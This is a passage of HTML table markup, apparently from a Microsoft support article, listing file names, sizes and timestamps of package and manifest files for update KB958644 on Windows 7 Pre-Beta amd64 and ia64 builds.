class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,827</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,045</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,045</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,045</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,045</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,832</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,832</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,814</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,814</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,476</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,476</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,465</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,465</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,951</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,951</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,474</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,474</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,476</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,476</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,465</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,465</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,470</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,470</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,475</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,475</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,401</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,187</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:25</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><br/><span class=\"text-base\">Additional files for all supported ia64-based versions of Windows 7 Pre-Beta</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_063c1cfe8cbabfce3ffb0dc28ef38fc5_31bf3856ad364e35_6.1.6801.4107_none_b39a525ed326a3c8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_dc308b4973bef77766097858c0f07d87_31bf3856ad364e35_6.1.6801.4106_none_5a453cd060e99fe3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_f556a82744118350805ca73aa737ccaa_31bf3856ad364e35_6.1.6801.4107_none_ff5785ba70f128b5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,035</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_f6840120760844e1cf48807bba0611b4_31bf3856ad364e35_6.1.6801.4106_none_0132ac58e91cf28f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td 